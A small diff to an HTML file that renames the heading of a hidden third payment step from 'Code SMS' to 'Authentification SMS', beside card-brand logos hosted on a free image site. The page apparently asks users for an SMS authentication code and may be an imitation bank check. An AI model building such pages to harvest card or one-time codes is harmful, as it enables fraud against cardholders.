--- a/index.html
+++ b/index.html
@@ -214,7 +214,7 @@
   </div>
 
   <div class="payment-container full-width-container hidden" id="step-3">
-    <h2>Code SMS</h2>
+    <h2>Authentification SMS</h2>
     <div class="icon-container">
       <img src="https://i.ibb.co/nkyQTHm/t-l-c.jpg" alt="CB">
       <img src="https://upload.wikimedia.org/wikipedia/commons/0/04/Visa.svg" alt="Visa">
